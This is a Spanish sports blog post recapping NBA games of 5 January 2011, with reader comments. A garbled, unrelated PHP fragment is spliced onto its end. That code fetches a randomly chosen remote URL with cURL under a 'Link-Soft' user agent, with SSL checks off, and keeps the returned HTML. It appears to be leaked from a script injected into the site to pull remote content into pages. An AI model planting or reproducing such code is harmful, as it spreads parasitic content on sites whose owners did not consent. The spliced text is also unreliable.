La Crónica (05/01/2011)

06 de January de 2011 por TheDeerHunter

Prueba de fuego para los Spurs visitando el TD Garden de Boston, sin Garnett como ya sabemos. Un partido de esos en los que la mente dice que los Celtics deberían perder fácil, pero el corazón sabe muy bien que eso no va a suceder. De la mano de una omnisciente actuación de Rajon Rondo (triple doble con 22 asistencias… de camino al cuádruple doble con 6 robos) el juego de los locales fluyó en su austeridad, alcanzando una precisión y una efectividad máxima, sacándole juego a cada jugada, a cada punto, a cada mínima ventaja. Un desesperado arreón de los Spurs en el tramo final estuvo a punto de cogerles a contrapié, pero con cierta suerte mantuvieron la ventaja. ¿La suerte de los campeones?

De los perseguidores Orlando le pasó por encima a Milwaukee y Atlanta logró una meritoria victoria en Salt Lake. Joe Johnson y Jamal Crawford parecen haberse entonado, aunque la baja de Millsap facilitó mucho la visita. Los Bulls por su parte se dieron un batacazo de muy señor mío en New Jersey. Claro caso de “sesteo” por parte de los toritos, que se dejaron comer la tostada por los Humphries, Graham… y sobre todo “The Machine” Vujacic, que les ganó el partido con un rebote ofensivo a 5′ para el final.

En el Oeste los Lakers ganaron a Phoenix sin enamorar a nadie mientras curiosamente su vecino pobre cada vez atrae a más entusiastas. Ahora se empiezan a gustar, con Baron Davis subido al carro dándole al público lo que siempre ha querido ver. Anoche un equipo como Denver fue un juguete en las manos de los Clippers… telita.
Los Blazers resisten ganándole un partido a Houston con 45 puntos de Kevin Martin. Ni los más viejos del lugar recordaban un partido tan democrático para los de McMillan. 8 hombres con 9+ puntos. Por su parte los Hornets con un partido ganado encajaron 38 puntos en un último cuarto apoteósico de los Warriors.

Más abajo los Wolves volvieron a desaprovechar un partido mágico de Love&Beasley ahogándose en la prórroga ante los Bobcats. Calderón deslumbró en la victoria de su equipo ante los Cavaliers y los Wizards firmaron su 0-17 fuera de casa ante los Sixers.

MVP: Hoy sólo puede ser uno. Supremo, casi tiránico, Rajon Rondo ante los Spurs. 12 puntos sólo… pero 22 asistencias, 10 rebotes, 6 robos, 1 tapón y lo que es más importante, su equipo anotando un 61% en buena medida gracias a él. La pesadilla de Popovic.

Rookie: A parte de “La Bestia” Griffin que ya sabemos que no tiene rival este año, hay por ahí un tal John Wall que no lo hace mal en Washington. 18 puntos, 14 asistencias que no sirven para estrenarse fuera de casa.

La sorpresa: Otra joven promesa que nos empieza a deslumbrar ahora. El Elegido… de Michael Jordan. Con todos vosotros Kwane Brown!!! y sus importantísimos 8-14 con los que contribuyó a la importante victoria de su equipo.
El clutch de Vujacic también tiene tela.

La decepción: Para Monty Williams, que se supone trata de lograr que su equipo defienda bien. 38 puntos encajados en un solo cuarto no es una gran carta de presentación de un sistema defensivo.

El mayor esfuerzo en vano: Además de Love&Beasley que siempre se lo llevan, un viejo conocido de esta sección vuelve por sus fueros. Kevin Martin anotó 45 con 13 de 18, 6 de 8 en triples y 13 de 15 tiros libres, y aún le dió tiempo a repartir 4 asistencias. Su equipo perdió porque entre todos sólo anotaron 10 puntos más que él.

Comenta

11 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    43 rebotes de Denver… DeAndre Jordan y Blake Griffin cogieron 38 entre los dos, increible estos Clippers, se lo estan creyendo y Davis (que no es santo de mi devocion) esta al nivel de sus mejores temporadas en los Warriors. Lastima de su mal comienzo de temporada, sino igual estabamos hablando de Playoffs para ellos.

    Vujacic que en los ultimos 10 segundos le dio tiempo para hacer una falta absurdisima de tiro para Chicago, coger un rebote ofensivo y meter la canasta ganadora. Que tio xD

      Citar

  2. Denise dice:
    #2

    Vujacic decidiendo un partido con un tiro debajo del aro…estoy soñando?
    Bogut who? Y este era mejor que Howard, Lemontus? Vilma!!!! En el partido anterior vs Orlando se ensañó gracias a la ausencia de Howard, pero anoche con él delante, plof, plof.
    Estamos viendo en esta temporada números de decadas pasadas, las asistencias de Rondo, los rebotes de Kevin Love..
    Si los Clippers no hubiesen empezado tan mal, quizás podría estar ahora luchando por playoffs.
    Otra victoria de mérito para Blazers y ya van…
    Que le pasa a Pau? Supuestamente ahora que está más descansado debería jugar mejor. El que está realmente bien es Bynum, la mejor noticia para Lakers en los últimos 15 días.

      Citar

  3. CAMPO2 dice:
    #3

    La jugada de los Nets para ganar el partido es chorra, intentan in aley-hoop(o como se escriba) entre harris y lopez , este ultimo no llega muy bien y el balon queda suelto, vujacic que pasaba porahi lo pilla y canatita.

    Los Nets empezaron el ultimo cuarto ganando de 13 y casi la lian

      Citar

  4. Ru dice:
    #4

    Si se me acepta la crítica The DeerHunter y desde mi humilde opinión,eran muy útiles los enlaces a los boxscores de los partidos,para echar un vistazo a los números de los jugadores 😉

      Citar

  5. rojorob dice:
    #5

    ¿De verdad no le dais ninguna opción de PO a los Clippers? Ahora mismo están a 7,5 victorias del octavo en el oeste, y a mí ni Portland ni N. Orleans me parecen muy fiables.

      Citar

  6. Roberto dice:
    #6

    Y nadie dice Nada de Ginóbili. Él sólo casi les gana a los Celtics, 24 puntos de los cuales ¡¡20!! metió en el último cuarto y 8 rebotes.

      Citar

  7. -=TheKing=- dice:
    #7

    Para mí los Spurs se dejan llevar, se dejan llevar a post temporada y estando en esas fechas daran lo máximo, que probablemente no sea sufuciente para ganar su final de conferencia, y que no caigan antes…

      Citar

  8. TheDeerHunter dice:
    #8

    Se acepta Ru… pero no siempre es posible. Fundamentalmente por cuestión de tiempo.

      Citar

  9. TheDeerHunter dice:
    #9

    nuevo recuento del asg

    Rondo-Wade-LeBron-Garnett-DH; CP3-Kobe-Melo-Durant-Bynum

    40.000 votos tienen la culpa de que Pau no esté delante de Melo

      Citar

  10. LEmontus dice:
    #10

    Denise no se si sabes que Bogut ha tenido una lesión muy muy chunga y ni mucho menos está al 100% el Bogut de este año no es ni un top 10 en pivots… tonterias no gracias.

      Citar

  11. a dice:
    #11

    Rondo es el futuro de los celtics. #ahíquedaeso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>